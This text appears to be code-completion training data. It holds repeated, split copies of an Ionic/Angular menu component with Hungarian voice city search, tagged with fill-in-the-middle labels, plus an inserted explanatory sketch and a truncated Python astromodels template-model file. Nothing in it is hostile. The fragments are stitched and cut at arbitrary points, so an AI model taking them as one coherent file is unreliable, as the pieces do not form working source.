if (alert) {
let alert = await this.alertCtrl.create({
header: this.trans['refresh']['title'],
message: this.trans['refresh']['message'],
buttons: [
{
text: this.trans['refresh']['yes'],
handler: () => {
location.href = '/';
}
},
{ text: this.trans['refresh']['no'] }
]
});
alert.present();
} else location.href = '/';
}
}
| this.openSpeech();
}
| conditional_block |
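The voice-search path above spreads the permission check, the listener and the result matching across askPermission(), openSpeech() and tempCalll(). The following condensed sketch shows the same chain with the @ionic-native/speech-recognition API; listenForCity is an illustrative helper, and the alert/loading UI from the component is deliberately left out.

import { SpeechRecognition } from '@ionic-native/speech-recognition/ngx';
import { take } from 'rxjs/operators';

// Sketch only: request microphone permission if needed, listen once in Hungarian,
// and return the first recognised phrase when it matches a known city value.
export async function listenForCity(
  speech: SpeechRecognition,
  knownValues: string[]
): Promise<string | null> {
  const allowed = await speech.hasPermission().catch(() => false);
  if (!allowed) {
    await speech.requestPermission();  // prompts the user on first use
  }
  const matches = await speech
    .startListening({ language: 'hu-HU', matches: 1, showPartial: true })
    .pipe(take(1))                     // resolve on the first emission
    .toPromise();
  const heard = (matches && matches[0] ? matches[0] : '').trim();
  return knownValues.indexOf(heard) > -1 ? heard : null;
}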
menus.component.ts | import { Component, OnInit } from '@angular/core';
import { CoreService } from 'src/app/services/core.service';
import { Platform, AlertController, PickerController } from '@ionic/angular';
import { SocialSharing } from '@ionic-native/social-sharing/ngx';
import { TranslateService } from '@ngx-translate/core';
import { Toast } from '@ionic-native/toast/ngx';
import { Storage } from '@ionic/storage';
import { EventsService } from 'src/app/services/events.service';
import { DEFAULT_LIST_POSTS_TEMPLATE } from '../../const/general';
import {HttpClient} from "@angular/common/http";
import {SpeechRecognition,SpeechRecognitionListeningOptions,SpeechRecognitionListeningOptionsIOS} from "@ionic-native/speech-recognition/ngx";
import { ItemCommentComponent } from '../item-comment/item-comment.component';
import { isArray } from 'util';
import { LoadingController, NavController } from '@ionic/angular';
import { ToastController } from '@ionic/angular';
import { InAppBrowser } from '@ionic-native/in-app-browser/ngx';
//import {ReportsPage} from '../../reports/reports.page';
// open jobs cat
import {Router} from "@angular/router";
declare var window;
@Component({
selector: 'app-menus',
templateUrl: './menus.component.html',
providers: [SocialSharing],
styleUrls: ['./menus.component.scss'],
})
export class MenusComponent implements OnInit {
// list pages data
pages: Object[];
// translate for this page
trans: Object;
// templates for settings
templates: string;
// Language display
CityName: any;
// set title
title: string;
public showSearchBar = false;
items:any[]=[];
itemstemp:any[]=[];
str:string="";
itemss:any[]=[];
asds:string="";
speakingStart:boolean = false;
constructor(
private translate: TranslateService,
private core: CoreService,
private platform: Platform,
private SocialSharing: SocialSharing,
private alertCtrl: AlertController,
private Toast: Toast,
private storage: Storage,
private pickerCtrl: PickerController,
private http:HttpClient,
events: EventsService,
private speech:SpeechRecognition,
public loadingController: LoadingController,
public toastController: ToastController,
private router:Router,
public navCtrl: NavController,
private iab: InAppBrowser
) {
this.navCtrl = navCtrl
window.menus = this;
// get translate
translate.get('menu').subscribe(trans => this.trans = trans);
// call get pages function
this.getPages();
// get templates from storage
storage.get('templates').then(templates => {
if (!templates) templates = DEFAULT_LIST_POSTS_TEMPLATE;
this.templates = templates;
});
events.watchOffline().subscribe(() => {
if ((!this.pages || this.pages.length < 1)) {
this.getPages();
}
});
this.getLanguage();
// Get the list of supported languages
// this.speech.getSupportedLanguages()
// .then(
// (languages: Array<string>) => console.log(languages),
// (error) => console.log(error)
// )
}
openUrl(url) |
// reports() {
// this.router.navigateByUrl('../reports/')
// }
// *********************************************************
// Voice search - No City found
// *********************************************************
ifNoResFound(){
this.alertCtrl.create({
message:"<h6>Nincs találat.</h6>",
buttons:[
{
text:"Újra",
handler:()=>{
this.speech.hasPermission().then((hasPermission)=>{
if(hasPermission)
{
this.openSpeech();
}
else{
this.speech.requestPermission().then(()=>{
this.openSpeech();
})
}
},(err)=>{
this.speech.requestPermission().then(()=>{
this.openSpeech();
})
})
}
},
{
text:"Bezár",
}
]
}).then((element)=>{
element.present();
})
}
// *********************************************************
// Voice search from here - Ask user permission to access the mic
// *********************************************************
askPermission()
{
if(this.speakingStart == false)
{
this.alertCtrl.create({
message:'<h1><ion-icon name="mic-outline" class="mix-size pulse-ring1" size="large"></ion-icon></h1> <p><h6>Kattints az OK gombra és beszélj.<h6></p>',
buttons:[
{
text:"OK",
handler:()=>{
this.speech.hasPermission().then((hasPermission)=>{
if(hasPermission)
{
this.openSpeech();
}
else{
this.speech.requestPermission().then(()=>{
this.openSpeech();
})
}
},(err)=>{
this.speech.requestPermission().then(()=>{
this.openSpeech();
})
})
}
},
{
text:"Bezár"
}
]
}).then((element)=>{
element.present();
})
}
}
// ***********************************
// Loading before show results - voice
// ***********************************
async presentLoading() {
const loading = await this.loadingController.create({
cssClass: 'my-custom-class',
message: '<ion-icon class="match-load" name="checkmark-outline"></ion-icon>Találat betoltése… ',
duration: 1000
});
await loading.present();
const { role, data } = await loading.onDidDismiss();
console.log('Loading dismissed!');
}
// ***********************************
// Show a listening prompt while the user talks
// ************************************
async presentToast() {
// const toast = await this.toastController.create({
// message: 'Talk now... <ion-icon name="mic-outline"></ion-icon>',
// duration: 3000,
// color: 'danger'
// // position: 'middle'
// });
// toast.present();
this.alertCtrl.create({
message:'<h1><ion-icon name="mic-outline" class="mix-size pulse-ring" size="large"></ion-icon></h1><br><h6 class="listening">Hallgatlak</h6>',
backdropDismiss: false // <- Here! :)
}).then((element)=>{
element.present();
// setTimeout(()=>{
// element.dismiss();
// }, 3000);
});
}
// *************************
// Call speech search
// **************************
openSpeech()
{
this.speakingStart = true;
// call talk now toast
this.presentToast();
var options:SpeechRecognitionListeningOptionsIOS=
{
showPartial:true,
matches:1,
language: 'hu-HU',
}
var ref = this;
let sub = this.speech.startListening(options).subscribe((data:string[])=>{
if(data.length > 0)
{
// hide alert for listening
this.alertCtrl.dismiss();
document.getElementById("ctc").innerHTML = "";
this.speech.stopListening();
sub.unsubscribe();
this.speakingStart = false;
var node = document.createElement("p");
let found = false;
for(var i = 0;i<this.itemstemp.length;i++)
{
if(data[0].trim() == this.itemstemp[i].value.trim())
{
// loading
this.presentLoading();
found = true;
// Show results after a 1 sec
setTimeout(() => {
// var textnode = document.createTextNode(data[0].trim()+">>"); // Create a text node
// node.appendChild(textnode);
// node.onclick = function()
// {
// ref.tempCalll(data[0].trim());
this.tempCalll(data[0].trim());
// }
// // Append the text to <div>
// document.getElementById("ctc").appendChild(node);
}, 1000);
// this.tempCalll(data[0].trim());
}
}
if(found == false)
{
//alert("No City found!");
// Call no city found method
this.ifNoResFound();
}
}
else{
alert("no records found!");
var para = document.createElement("P");
var t = document.createTextNode("no records found!");
para.appendChild(t);
document.getElementById("ctc").appendChild(para);
}
},(err)=>{
//alert(JSON.stringify(err));
//this.speech.stopListening();
//this.openSpeech()
this.ifNoResFound();
})
}
// Show result of voice search
tempCalll(dat)
{
//alert(dat);
for(var i = 0;i<this.itemstemp.length;i++)
{
if(dat == this.itemstemp[i].value)
{
//alert("matched");
this.tempCall(this.itemstemp[i]);
return;
}
}
}
getItemsVoice(str) {
// Reset items back to all of the items
//console.log(this.getCities());
// set val to the value of the searchbar
//this.isItemAvailable = true;
const val = str;
console.log(val);
this.items = this.itemstemp;
// // if the value is an empty string don't filter the items
if (val && val.trim() !== '') {
this.isItemAvailable = true;
this.items = this.items.filter((item) => {
return (item.name.toLowerCase().indexOf(val.toLowerCase()) > -1);
})
if(this.items.length > 0)
{
this.str = "";
}
else{
this.str = "Nincs találat.";
}
} else{
this.isItemAvailable = false;
}
}
// *************************
// Show search input
// *************************
clickedSearchIcon(event: Event) {
this.showSearchBar = !this.showSearchBar;
}
// *************************
// auto search
// *************************
isItemAvailable = false;
readJsonData(){
//this.items = ["Test", "Test1", "Test2"].subscribe(data => {
this.http.get("assets/i18n/languages.json").subscribe((data:any)=>{
this.items =data.languages;
this.itemstemp = this.items;
//this.isItemAvailable = true;
})
}
// *************************
// Get autocomplete items
// *************************
getItems(ev: any) {
// Reset items back to all of the items
//console.log(this.getCities());
// set val to the value of the searchbar
//this.isItemAvailable = true;
document.getElementById("ctc").innerHTML = "";
const val = ev.target.value;
console.log(val);
this.items = this.itemstemp;
// // if the value is an empty string don't filter the items
if (val && val.trim() !== '') {
this.isItemAvailable = true;
this.items = this.items.filter((item) => {
return (item.name.toLowerCase().indexOf(val.toLowerCase()) > -1);
})
if(this.items.length > 0)
{
this.str = "";
}
else{
this.str = "No City found";
}
} else{
this.isItemAvailable = false;
}
}
// Display City In the Header
// ************************
getLanguage() {
this.storage.get("language").then((language) => {
this.CityName = language;
console.log(this.CityName);
})
}
ngOnInit() {
//this.loadData();
this.readJsonData();
}
getPages(refresher?) {
// function get list pages
this.core.request('m_pages').subscribe(pages => {
this.pages = pages;
if (refresher) refresher.target.complete();
}, err => {
if (refresher) refresher.target.complete();
});
}
async settings() {
// when click templates
let alert = await this.alertCtrl.create({
header: this.trans['settings']['title'],
cssClass: 'alert-buttons-no-border',
buttons: [
// {
// text: this.trans['languages']['title'],
// handler: () => { this.languages(); }
// },
{
text: this.trans['templates']['title'],
handler: () => { this.updateTemplates(); }
},
{
text: this.trans['cache']['title'],
handler: () => { this.clearCache(); }
},
{
text: this.trans['settings']['cancel'],
cssClass: 'place'
}
]
});
alert.present();
}
// get languages
languages() {
let language = this.translate.getDefaultLang();
this.translate.getTranslation('languages').subscribe(async langTrans => {
if (langTrans['languages'] && langTrans['languages'].length > 0) {
// create picker
// add picker column
let columns: any = {
name: 'language',
options: []
};
// add column options
let defaultIndex: Number;
langTrans['languages'].forEach((lang, index) => {
columns.options.push({
text: lang['name'],
value: lang['value']
});
// find default index
if (lang['value'] == language) defaultIndex = index;
});
// set default index and add column
columns['selectedIndex'] = defaultIndex;
if (!language) language = langTrans['default'];
let picker = await this.pickerCtrl.create({
columns: [columns],
buttons: [
{
text: this.trans['languages']['cancel'],
role: 'cancel'
},
{
text: this.trans['languages']['save'],
handler: data => {
if (data['language']['value'] == language) return;
this.storage.set('language', data['language']['value']).then(() => {
this.storage.remove('last_config').then(() => {
this.refresh();
});
});
}
}
]
});
// show picker
picker.present();
}
});
}
// *********************************
// Call city set after click on item
// *********************************
tempCall(obj)
{
//alert(obj);
//alert(JSON.stringify(obj));
let data:any={};
data['language'] = obj.value;
//alert(obj.value);
this.storage.set('language', data['language']).then(() => {
this.storage.remove('last_config').then(() => {
// alert("refresh call 1");
this.refresh();
},(err)=>{
// alert("refresh call 2");
this.refresh();
}) ;
},(err)=>{
//alert("refresh call 3");
this.refresh();
});
}
// Update template
async updateTemplates() {
if (!Array.isArray(this.trans['templates']['options'])) return;
let buttons = [];
// when click templates
this.trans['templates']['options'].forEach(option => {
let button = {
text: option['text'],
cssClass: option['_value'] == this.templates ? 'danger' : '',
handler: () => {
if (option['_value'] == this.templates) return;
this.storage.set('templates', option['_value']).then(() => {
this.refresh();
});
}
};
buttons.push(button);
});
buttons.push({
text: this.trans['templates']['cancel'],
cssClass: 'place'
});
let alert = await this.alertCtrl.create({
header: this.trans['templates']['title'],
message: this.trans['templates']['message'],
cssClass: 'alert-buttons-no-border',
buttons: buttons
});
alert.present();
}
clearCache() {
// when click clear cache
this.platform.ready().then(async () => {
let alert = await this.alertCtrl.create({
header: this.trans['cache']['title'],
message: this.trans['cache']['message'],
buttons: [
{
text: this.trans['cache']['yes'],
handler: () => {
if (window && window['CacheClear']) window['CacheClear'](status => {
this.Toast.showShortCenter(this.trans['cache']['success']).subscribe(() => { }, () => { });
}, err => {
this.Toast.showShortCenter(this.trans['cache']['error']).subscribe(() => { }, () => { });
});
}
},
{ text: this.trans['cache']['no'] }
]
});
alert.present();
});
}
rate() {
// function open application on store
this.core.openStore();
}
// share application store link
// *****************************
share() {
// function share application
let share = this.platform.is('ios') ? this.core.getConfig('share_ios') : this.core.getConfig('share_android');
this.SocialSharing.share(share, null, null, null);
}
async refresh(alert?) {
// refresh application
if (alert) {
let alert = await this.alertCtrl.create({
header: this.trans['refresh']['title'],
message: this.trans['refresh']['message'],
buttons: [
{
text: this.trans['refresh']['yes'],
handler: () => {
location.href = '/';
}
},
{ text: this.trans['refresh']['no'] }
]
});
alert.present();
} else location.href = '/';
}
}
| {
this.iab.create( url, '_system' );
} | identifier_body |
menus.component.ts | import { Component, OnInit } from '@angular/core';
import { CoreService } from 'src/app/services/core.service';
import { Platform, AlertController, PickerController } from '@ionic/angular';
import { SocialSharing } from '@ionic-native/social-sharing/ngx';
import { TranslateService } from '@ngx-translate/core';
import { Toast } from '@ionic-native/toast/ngx';
import { Storage } from '@ionic/storage';
import { EventsService } from 'src/app/services/events.service';
import { DEFAULT_LIST_POSTS_TEMPLATE } from '../../const/general';
import {HttpClient} from "@angular/common/http";
import {SpeechRecognition,SpeechRecognitionListeningOptions,SpeechRecognitionListeningOptionsIOS} from "@ionic-native/speech-recognition/ngx";
import { ItemCommentComponent } from '../item-comment/item-comment.component';
import { isArray } from 'util';
import { LoadingController, NavController } from '@ionic/angular';
import { ToastController } from '@ionic/angular';
import { InAppBrowser } from '@ionic-native/in-app-browser/ngx';
//import {ReportsPage} from '../../reports/reports.page';
// open jobs cat
import {Router} from "@angular/router";
declare var window;
@Component({
selector: 'app-menus',
templateUrl: './menus.component.html',
providers: [SocialSharing],
styleUrls: ['./menus.component.scss'],
})
export class MenusComponent implements OnInit {
// list pages data
pages: Object[];
// translate for this page
trans: Object;
// templates for settings
templates: string;
// Language display
CityName: any;
// set title
title: string;
public showSearchBar = false;
items:any[]=[];
itemstemp:any[]=[];
str:string="";
itemss:any[]=[];
asds:string="";
speakingStart:boolean = false;
constructor(
private translate: TranslateService,
private core: CoreService,
private platform: Platform,
private SocialSharing: SocialSharing,
private alertCtrl: AlertController,
private Toast: Toast,
private storage: Storage,
private pickerCtrl: PickerController,
private http:HttpClient,
events: EventsService,
private speech:SpeechRecognition,
public loadingController: LoadingController,
public toastController: ToastController,
private router:Router,
public navCtrl: NavController,
private iab: InAppBrowser
) {
this.navCtrl = navCtrl
window.menus = this;
// get translate
translate.get('menu').subscribe(trans => this.trans = trans);
// call get pages function
this.getPages();
// get templates from storage
storage.get('templates').then(templates => {
if (!templates) templates = DEFAULT_LIST_POSTS_TEMPLATE;
this.templates = templates;
});
events.watchOffline().subscribe(() => {
if ((!this.pages || this.pages.length < 1)) {
this.getPages();
}
});
this.getLanguage();
// Get the list of supported languages
// this.speech.getSupportedLanguages()
// .then(
// (languages: Array<string>) => console.log(languages),
// (error) => console.log(error)
// )
}
openUrl(url) {
this.iab.create( url, '_system' );
}
// reports() {
// this.router.navigateByUrl('../reports/')
// }
// *********************************************************
// Voice search - No City found
// *********************************************************
ifNoResFound(){
this.alertCtrl.create({
message:"<h6>Nincs találat.</h6>",
buttons:[
{
text:"Újra",
handler:()=>{
this.speech.hasPermission().then((hasPermission)=>{
if(hasPermission)
{
this.openSpeech();
}
else{
this.speech.requestPermission().then(()=>{
this.openSpeech();
})
}
},(err)=>{
this.speech.requestPermission().then(()=>{
this.openSpeech();
})
})
}
},
{
text:"Bezár",
}
]
}).then((element)=>{
element.present();
})
}
// *********************************************************
// Voice search from here - Ask user permission to access the mic
// *********************************************************
askPermission()
{
if(this.speakingStart == false)
{
this.alertCtrl.create({
message:'<h1><ion-icon name="mic-outline" class="mix-size pulse-ring1" size="large"></ion-icon></h1> <p><h6>Kattints az OK gombra és beszélj.<h6></p>',
buttons:[
{
text:"OK",
handler:()=>{
this.speech.hasPermission().then((hasPermission)=>{
if(hasPermission)
{
this.openSpeech();
}
else{
this.speech.requestPermission().then(()=>{
this.openSpeech();
})
}
},(err)=>{
this.speech.requestPermission().then(()=>{
this.openSpeech();
})
})
}
},
{
text:"Bezár"
}
]
}).then((element)=>{
element.present();
})
}
}
// ***********************************
// Loading before show results - voice
// ***********************************
async presentLoading() {
const loading = await this.loadingController.create({
cssClass: 'my-custom-class',
message: '<ion-icon class="match-load" name="checkmark-outline"></ion-icon>Találat betoltése… ',
duration: 1000
});
await loading.present();
const { role, data } = await loading.onDidDismiss();
console.log('Loading dismissed!');
}
// ***********************************
// Show a listening prompt while the user talks
// ************************************
async presentToast() {
// const toast = await this.toastController.create({
// message: 'Talk now... <ion-icon name="mic-outline"></ion-icon>',
// duration: 3000,
// color: 'danger'
// // position: 'middle'
// });
// toast.present();
this.alertCtrl.create({
message:'<h1><ion-icon name="mic-outline" class="mix-size pulse-ring" size="large"></ion-icon></h1><br><h6 class="listening">Hallgatlak</h6>',
backdropDismiss: false // <- Here! :)
}).then((element)=>{
element.present();
// setTimeout(()=>{
// element.dismiss();
// }, 3000);
});
}
// *************************
// Call speech search
// **************************
openSpeech()
{
this.speakingStart = true;
// call talk now toast
this.presentToast();
var options:SpeechRecognitionListeningOptionsIOS=
{
showPartial:true,
matches:1,
language: 'hu-HU',
}
var ref = this;
let sub = this.speech.startListening(options).subscribe((data:string[])=>{
if(data.length > 0)
{
// hide alert for listening
this.alertCtrl.dismiss();
document.getElementById("ctc").innerHTML = "";
this.speech.stopListening();
sub.unsubscribe();
this.speakingStart = false;
var node = document.createElement("p");
let found = false;
for(var i = 0;i<this.itemstemp.length;i++)
{
if(data[0].trim() == this.itemstemp[i].value.trim())
{
// loading
this.presentLoading();
found = true;
// Show results after a 1 sec
setTimeout(() => {
// var textnode = document.createTextNode(data[0].trim()+">>"); // Create a text node
// node.appendChild(textnode);
// node.onclick = function()
// {
// ref.tempCalll(data[0].trim());
this.tempCalll(data[0].trim());
// }
// // Append the text to <div>
// document.getElementById("ctc").appendChild(node);
}, 1000);
// this.tempCalll(data[0].trim());
}
}
if(found == false)
{
//alert("No City found!");
// Call no city found method
this.ifNoResFound();
}
}
else{
alert("no records found!");
var para = document.createElement("P");
var t = document.createTextNode("no records found!");
para.appendChild(t);
document.getElementById("ctc").appendChild(para);
}
},(err)=>{
//alert(JSON.stringify(err));
//this.speech.stopListening();
//this.openSpeech()
this.ifNoResFound();
})
}
// Show result of voice search
tempCalll(dat)
{
//alert(dat);
for(var i = 0;i<this.itemstemp.length;i++)
{
if(dat == this.itemstemp[i].value)
{
//alert("matched");
this.tempCall(this.itemstemp[i]);
return;
}
}
}
getItemsVoice(str) {
// Reset items back to all of the items
//console.log(this.getCities());
// set val to the value of the searchbar
//this.isItemAvailable = true;
const val = str;
console.log(val);
this.items = this.itemstemp;
// // if the value is an empty string don't filter the items
if (val && val.trim() !== '') {
this.isItemAvailable = true;
this.items = this.items.filter((item) => {
return (item.name.toLowerCase().indexOf(val.toLowerCase()) > -1);
})
if(this.items.length > 0)
{
this.str = "";
}
else{
this.str = "Nincs találat.";
}
} else{
this.isItemAvailable = false;
}
}
// *************************
// Show search input
// *************************
clickedSearchIcon(event: Event) {
this.showSearchBar = !this.showSearchBar;
}
// *************************
// auto search
// *************************
isItemAvailable = false;
readJsonData(){
//this.items = ["Test", "Test1", "Test2"].subscribe(data => {
this.http.get("assets/i18n/languages.json").subscribe((data:any)=>{
this.items =data.languages;
this.itemstemp = this.items;
//this.isItemAvailable = true;
})
}
// *************************
// Get autocomplete items
// *************************
getItems(ev: any) {
// Reset items back to all of the items
//console.log(this.getCities());
// set val to the value of the searchbar
//this.isItemAvailable = true;
document.getElementById("ctc").innerHTML = "";
const val = ev.target.value;
console.log(val);
this.items = this.itemstemp;
// // if the value is an empty string don't filter the items
if (val && val.trim() !== '') {
this.isItemAvailable = true;
this.items = this.items.filter((item) => {
return (item.name.toLowerCase().indexOf(val.toLowerCase()) > -1);
})
if(this.items.length > 0)
{
this.str = "";
}
else{
this.str = "No City found";
}
} else{
this.isItemAvailable = false;
}
}
// Display City In the Header
// ************************
getLanguage() {
this.storage.get("language").then((language) => {
this.CityName = language;
console.log(this.CityName);
})
}
ngOnInit() {
//this.loadData();
this.readJsonData();
}
getPages(refresher?) {
// function get list pages
this.core.request('m_pages').subscribe(pages => {
this.pages = pages;
if (refresher) refresher.target.complete();
}, err => {
if (refresher) refresher.target.complete();
});
}
async settings() {
// when click templates
let alert = await this.alertCtrl.create({
header: this.trans['settings']['title'],
cssClass: 'alert-buttons-no-border',
buttons: [
// {
// text: this.trans['languages']['title'],
// handler: () => { this.languages(); }
// },
{
text: this.trans['templates']['title'],
handler: () => { this.updateTemplates(); }
},
{
text: this.trans['cache']['title'],
handler: () => { this.clearCache(); }
},
{
text: this.trans['settings']['cancel'],
cssClass: 'place'
}
]
});
alert.present();
}
// get languages
languages() {
let language = this.translate.getDefaultLang();
this.translate.getTranslation('languages').subscribe(async langTrans => {
if (langTrans['languages'] && langTrans['languages'].length > 0) {
// create picker
// add picker column
let columns: any = {
name: 'language',
options: []
};
// add column options
let defaultIndex: Number;
langTrans['languages'].forEach((lang, index) => {
columns.options.push({
text: lang['name'],
value: lang['value']
});
// find default index
if (lang['value'] == language) defaultIndex = index;
});
// set default index and add column
columns['selectedIndex'] = defaultIndex;
if (!language) language = langTrans['default'];
let picker = await this.pickerCtrl.create({
columns: [columns],
buttons: [
{
text: this.trans['languages']['cancel'],
role: 'cancel'
},
{
text: this.trans['languages']['save'],
handler: data => {
if (data['language']['value'] == language) return;
this.storage.set('language', data['language']['value']).then(() => {
this.storage.remove('last_config').then(() => {
this.refresh();
});
});
}
}
]
});
// show picker
picker.present();
}
});
}
// *********************************
// Call city set after click on item
// *********************************
tempCall(obj)
{
//alert(obj);
//alert(JSON.stringify(obj));
let data:any={};
data['language'] = obj.value;
//alert(obj.value);
this.storage.set('language', data['language']).then(() => {
this.storage.remove('last_config').then(() => {
// alert("refresh call 1");
this.refresh();
},(err)=>{
// alert("refresh call 2"); | });
}
// Update template
async updateTemplates() {
if (!Array.isArray(this.trans['templates']['options'])) return;
let buttons = [];
// when click templates
this.trans['templates']['options'].forEach(option => {
let button = {
text: option['text'],
cssClass: option['_value'] == this.templates ? 'danger' : '',
handler: () => {
if (option['_value'] == this.templates) return;
this.storage.set('templates', option['_value']).then(() => {
this.refresh();
});
}
};
buttons.push(button);
});
buttons.push({
text: this.trans['templates']['cancel'],
cssClass: 'place'
});
let alert = await this.alertCtrl.create({
header: this.trans['templates']['title'],
message: this.trans['templates']['message'],
cssClass: 'alert-buttons-no-border',
buttons: buttons
});
alert.present();
}
clearCache() {
// when click clear cache
this.platform.ready().then(async () => {
let alert = await this.alertCtrl.create({
header: this.trans['cache']['title'],
message: this.trans['cache']['message'],
buttons: [
{
text: this.trans['cache']['yes'],
handler: () => {
if (window && window['CacheClear']) window['CacheClear'](status => {
this.Toast.showShortCenter(this.trans['cache']['success']).subscribe(() => { }, () => { });
}, err => {
this.Toast.showShortCenter(this.trans['cache']['error']).subscribe(() => { }, () => { });
});
}
},
{ text: this.trans['cache']['no'] }
]
});
alert.present();
});
}
rate() {
// function open application on store
this.core.openStore();
}
// share application store link
// *****************************
share() {
// function share application
let share = this.platform.is('ios') ? this.core.getConfig('share_ios') : this.core.getConfig('share_android');
this.SocialSharing.share(share, null, null, null);
}
async refresh(alert?) {
// refresh application
if (alert) {
let alert = await this.alertCtrl.create({
header: this.trans['refresh']['title'],
message: this.trans['refresh']['message'],
buttons: [
{
text: this.trans['refresh']['yes'],
handler: () => {
location.href = '/';
}
},
{ text: this.trans['refresh']['no'] }
]
});
alert.present();
} else location.href = '/';
}
} | this.refresh();
}) ;
},(err)=>{
//alert("refresh call 3");
this.refresh(); | random_line_split |
template_model.py | from astromodels.functions.function import Function1D, FunctionMeta
from astromodels.utils.configuration import get_user_data_path
import collections
from astromodels.parameter import Parameter
import numpy as np
import pandas as pd
from pandas import HDFStore
import scipy.interpolate
import os
import re
import warnings
import astropy.units as u
class IncompleteGrid(RuntimeError):
pass
class ValuesNotInGrid(ValueError):
pass
class MissingDataFile(RuntimeError):
pass
class TemplateModelFactory(object):
def __init__(self, name, description, energies, names_of_parameters,
interpolation_degree=1, spline_smoothing_factor=0):
# Store model name
# Enforce that it does not contain spaces nor strange characters
name = str(name)
if re.match("[a-zA-Z_][a-zA-Z0-9_]*", name) is None:
raise RuntimeError("The provided name '%s' is not a valid name. You cannot use spaces, "
"or special characters" % name)
self._name = name
self._description = str(description)
# Store energy grid
if not isinstance(energies, u.Quantity):
warnings.warn("Energy unit is not a Quantity instance, so no unit has been provided. Using keV.")
energies = energies * u.keV
self._energies = np.array(energies.to(u.keV).value)
# Enforce that they are ordered
self._energies.sort()
# We create a dictionary which will contain the grid for each parameter
self._parameters_grids = collections.OrderedDict()
for parameter_name in names_of_parameters:
self._parameters_grids[parameter_name] = None
self._data_frame = None
self._multi_index = None
self._interpolators = None
self._interpolation_degree = interpolation_degree
self._spline_smoothing_factor = int(spline_smoothing_factor)
def define_parameter_grid(self, parameter_name, grid):
assert parameter_name in self._parameters_grids, "Parameter %s is not part of this model" % parameter_name
grid_ = np.array(grid)
assert grid_.shape[0] > 1, "A grid for a parameter must contain at least two elements"
# Assert that elements are unique
assert np.all(np.unique(grid_) == grid_), "Non-unique elements in grid for parameter %s" % parameter_name
self._parameters_grids[parameter_name] = grid_
def add_interpolation_data(self, differential_fluxes, **parameters_values_input):
# Verify that the grid has been defined for all parameters
for grid in self._parameters_grids.values():
if grid is None:
raise IncompleteGrid("You need to define a grid for all parameters, by using the "
"define_parameter_grid method.")
if self._data_frame is None:
# This is the first data set, create the data frame
# Create the multi-index
self._multi_index = pd.MultiIndex.from_product(self._parameters_grids.values(),
names=self._parameters_grids.keys())
# Pre-fill the data matrix with nans, so we will know if some elements have not been filled
self._data_frame = pd.DataFrame(index=self._multi_index, columns=self._energies)
# Make sure we have all parameters and order the values in the same way as the dictionary
parameters_values = np.zeros(len(self._parameters_grids)) * np.nan
for key in parameters_values_input:
assert key in self._parameters_grids, "Parameter %s is not known" % key
idx = self._parameters_grids.keys().index(key)
parameters_values[idx] = parameters_values_input[key]
# If the user did not specify one of the parameters, then the parameters_values array will contain nan
assert np.all(np.isfinite(parameters_values)), "You didn't specify all parameters' values."
# Make sure we are dealing with arrays (list will be transformed)
if not isinstance(differential_fluxes, u.Quantity):
differential_fluxes = differential_fluxes * 1/(u.keV*u.s*u.cm**2)
differential_fluxes = np.array(differential_fluxes.to(1/(u.keV*u.s*u.cm**2)).value)
n_parameters = parameters_values.shape[0]
assert self._energies.shape[0] == differential_fluxes.shape[0], "Differential fluxes and energies must have " \
"the same number of elements"
# Now set the corresponding values in the data frame
try:
self._data_frame.loc[tuple(parameters_values)] = pd.to_numeric(differential_fluxes)
except KeyError:
raise ValuesNotInGrid("The provided parameter values (%s) are not in the defined grid" % parameters_values)
@staticmethod
def _clean_cols_for_hdf(data):
types = data.apply(lambda x: pd.lib.infer_dtype(x.values))
for col in types.index:
data[col] = pd.to_numeric(data[col])
return data
def save_data(self, overwrite=False):
# First make sure that the whole data matrix has been filled
assert not self._data_frame.isnull().values.any(), "You have NaNs in the data matrix. Usually this means " \
"that you didn't fill it up completely, or that some of " \
"your data contains nans. Cannot save the file."
# Get the data directory
data_dir_path = get_user_data_path()
# Sanitize the data file
filename_sanitized = os.path.abspath(os.path.join(data_dir_path, '%s.h5' % self._name))
# Check that it does not exists
if os.path.exists(filename_sanitized):
if overwrite:
try:
os.remove(filename_sanitized)
except:
raise IOError("The file %s already exists and cannot be removed (maybe you do not have "
"permissions to do so?). " % filename_sanitized)
else:
raise IOError("The file %s already exists! You cannot call two different "
"template models with the same name" % filename_sanitized)
# Open the HDF5 file and write objects
with HDFStore(filename_sanitized) as store:
# The _clean_cols_for_hdf is needed because for some reasons the format of some columns
# is not accepted by .to_hdf otherwise
self._clean_cols_for_hdf(self._data_frame).to_hdf(store, 'data_frame')
store.get_storer('data_frame').attrs.metadata = {'description': self._description,
'name': self._name,
'interpolation_degree': int(self._interpolation_degree),
'spline_smoothing_factor': self._spline_smoothing_factor
}
for i, parameter_name in enumerate(self._parameters_grids.keys()):
store['p_%i_%s' % (i, parameter_name)] = pd.Series(self._parameters_grids[parameter_name])
store['energies'] = pd.Series(self._energies)
# This adds a method to a class at runtime
def add_method(self, method, name=None):
if name is None:
name = method.func_name
setattr(self.__class__, name, method)
class RectBivariateSplineWrapper(object):
"""
Wrapper around RectBivariateSpline, which supplies a __call__ method which accept the same
syntax as the other interpolation methods
"""
def __init__(self, *args, **kwargs):
# We can use interp2, which features spline interpolation instead of linear interpolation
self._interpolator = scipy.interpolate.RectBivariateSpline(*args, **kwargs)
def __call__(self, x):
res = self._interpolator(*x)
return res[0][0]
class TemplateModel(Function1D):
r"""
description :
A template model
latex : $n.a.$
parameters :
K :
desc : Normalization (freeze this to 1 if the template provides the normalization by itself)
initial value : 1.0
scale :
desc : Scale for the independent variable. The templates are handled as if they contain the fluxes
at x / scale. This is useful for example when the template describes energies in the rest frame,
at which point the scale describes the transformation between rest-frame energy and observer-frame
energy. Fix this to 1 to neutralize its effect.
initial value : 1.0
min : 1e-5
"""
__metaclass__ = FunctionMeta
def _custom_init_(self, model_name):
# Get the data directory
data_dir_path = get_user_data_path()
# Sanitize the data file
filename_sanitized = os.path.abspath(os.path.join(data_dir_path, '%s.h5' % model_name))
if not os.path.exists(filename_sanitized):
raise MissingDataFile("The data file %s does not exists. Did you use the "
"TemplateFactory?" % (filename_sanitized))
# Open the template definition and read from it
self._data_file = filename_sanitized
with HDFStore(filename_sanitized) as store:
self._data_frame = store['data_frame']
self._parameters_grids = collections.OrderedDict()
processed_parameters = 0
for key in store.keys():
match = re.search('p_([0-9]+)_(.+)', key)
if match is None:
continue
else:
tokens = match.groups()
this_parameter_number = int(tokens[0])
this_parameter_name = str(tokens[1])
assert this_parameter_number == processed_parameters, "Parameters out of order!"
self._parameters_grids[this_parameter_name] = store[key]
processed_parameters += 1
self._energies = store['energies']
# Now get the metadata
metadata = store.get_storer('data_frame').attrs.metadata
description = metadata['description']
name = metadata['name']
